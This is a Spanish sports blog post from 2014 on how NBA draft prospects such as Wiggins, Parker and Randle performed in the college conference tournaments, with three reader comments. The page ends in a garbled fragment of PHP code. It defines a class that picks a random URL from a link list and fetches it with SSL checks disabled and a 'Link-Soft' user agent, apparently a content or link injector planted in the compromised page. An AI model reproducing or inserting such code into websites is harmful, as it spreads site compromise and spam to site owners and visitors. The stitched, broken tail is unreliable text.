Seguimiento del Draft 2014: Torneos regionales

17 de March de 2014 por Viva_Dirk

Se acabaron las tonterías. Mañana martes ya se juegan los primeros partidos de la March Madness aunque será el jueves cuando realmente comience la locura. Como os explicábamos en el pasado artículo, la semana pasada estaba dedicada a la resolución de los diferentes torneos regionales y todos los jugadores volvieron a entrar el liza. Repasamos las actuaciones de los jugadores más importantes:

Kansas: Sin la participación de Joel Embiid todo el protagonismo estaba centrado en Andrew Wiggins. El canadiense respondió a la perfección en el primer partido con 30 puntos, 8 rebotes, 3 asistencias y 3 robos ante los Cowboys de Marcus Smart y en el segundo volvió a asumir protagonismo con 21 tiros, 22 puntos y 7 rebotes. Sin embargo, los Jayhawks cayeron en semifinales contra Iowa, los a la postre campeones. Su compañero Wayne Selden promedió en los dos partidos jugados 11.5 puntos con un 35% en tiros.

Duke: Los Blue Devils cayeron en la final del torneo ante Virginia, uno de los cabezas de serie del torneo nacional. Jabari Parker promedió 20 puntos, 6 rebotes y un 41% en tiros, mientras que su compañero Rodney Hood aportó 14.6 puntos. Durante la final ambos tuvieron problemas para anotar con fluidez, algo que Duke no se puede permitir.

Kentucky: Los Wildcats también cayeron en la final, ellos ante Florida, tal vez los máximos favoritos al título universitario. En los 2 primeros partidos del torneo Julius Randle promedió 14.5 puntos y 13.5 rebotes pero en el decisivo se hundió y acabó con 4 puntos y un 1 de 7 en tiros de campo. James Young promedió 16 puntos por noche pero tampoco estuvo muy fino el último. De hecho, el mejor de la final fue Willie Cauley Stein con 10 puntos, 11 rebotes y 6 tapones. 

Oklahoma State: Marcus Smart se merendó a Texas Tech en el primer partido con 18 puntos, 7 rebotes, 7 asistencias y 6 robos pero naufragó en el segundo frente Kansas. Acabó con 14 puntos y 7 rebotes pero con 4 de 14 en tiros de campo.

Indiana: Noah Vonleh acabó la temporada con un mal partido, 7 puntos, 5 rebotes y un 3 de 9 en tiros que no están a la altura de lo que se espera de él. Los Hoosiers no estarán en la March Madness pero a la espera de lo que suceda en el torno y de cómo acaben la temporada algunos jugadores europeos, Vonleh parece tener un lugar fijo en el top 10.

Arizona: Aaron Gordon dejó muestras de su calidad con unos completísimos números: 10.3 puntos, 8 rebotes, 4.3 asistencias, 2.6 robos y 1.6 tapones, con un 43% en tiros. Nick Johnson se dejó ver con 17.3 puntos. Sin embargo, los Wildcats cayeron por sorpresa en la final ante UCLA.

Creighton: Los BlueJays cayeron en la final de su torneo ante Providence a pesar de los 27 puntos de Doug McDermott. En los 3 partidos del torneo promedió 31.3 puntos y 5 rebotes. Canela fina.

Syracuse: Tropiezo a las primeras de cambio y malas sensaciones para los Orange. Jerami Grant, con 19-10, y Tyler Ennis, con 21-5-6 y 4 robos, estuvieron a gran nivel pero la rotación ultracorta que utilizan puede hacer que su aventura acabe antes de lo previsto en marzo.

Fuera de los jugadores de lotería no podemos dejar de destacar a Kyle Anderson (15 puntos, 10.3 rebotes y 6 asistencias de promedio con partidazo frente Arizona en la final incluido), Elfrid Payton (16.6 puntos, 5.3 rebotes, 7 asistencias y campeonato) y TJ Warren (24.3 puntos y 8 rebotes de promedio).

En un par de días, ¡la previa de la March Madness 2014!

Comenta

3 comentarios a esta entrada

  1. Esteban dice:
    #1

    de poquito de a poquito, wiggins vuelve a ser favorito como numero 1 y se retoman las esperanzas de q sea un jugador total que marque epoca

    embiid tiene buena pinta, pero yo ni loco me la juego poor un centro que encima parece tener algunos problemas de lesiones, prefiero ir a lo seguro, despues si sale un Drummond, felicitaciones para los que tomaron el riesgo, yo me quedo con wiggins

      Citar

  2. Sancho88 dice:
    #2

    Igual voy a decir una locura, pero cuando veo a Wiggins corriendo la cancha con el balón en las manos, y obviando que no tiene ni probablemente tendrá el control de balón que Jordan, me recuerda a Su Majestad cuando empezó, al Michael de Los Ángeles 84. Ojo, digo de la apariencia, la figura, la plasticidad, todo. Este chaval es realmente especial. Y sí, va a marcar una época en el baloncesto. Tengo una intuición tremenda con él, da un feeling increíble. Lo va a conseguir seguro

      Citar

  3. Sancho88 dice:
    #3

    https://www.youtube.com/watch?v=LXt5JtlWnps

    Diréis, este Sancho siempre diciendo tonterías. Ok. 1:40. Esa jugada. Esa puta jugada. Joder…. decidme que no tiene cosas de THE FLIGHT. Yo ahí he visto a MJ. Le falta timing, obviamente, y estética, y de todo, pero ahí hay algo muy muy especial por pulir. Ese chaval canadiense sabe lo que hace en defensa, y en el momento que el puto esquema del parque jurásico, antiguo antiguo de Kansas le ha dejado jugar 1×1 se está soltando, está volviendo a dejar esas sensaciones del instituto y dan muchísimas ganas de verle jugar con los mayores. El duelo generacional entre Wiggins y Jabari Parker está ahí. Por más que me empeño en encontrarles defectos grandes a los dos, cosas que les hagan sospechosos, pensar que se la van a pegar en la NBA, no encuentro motivos. Lo tienen absolutamente todo. Wiggins más físico que Parker y Parker mejor mano desde fuera que Wiggins, y a lo mejor Wiggins es más disciplinado y defiende más fuerte y Parker más perro defendiendo pero con mejor instinto en el rebote. No sé, obviamente son jugadores distintos con físicos distintos, a pesar de medir lo mismo. Pero cada día que pasa voy descartando a Embiid por el tema físico, pero estoy convencido de que estos dos van a marcar una época. Me encantan los dos. Son brutales

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>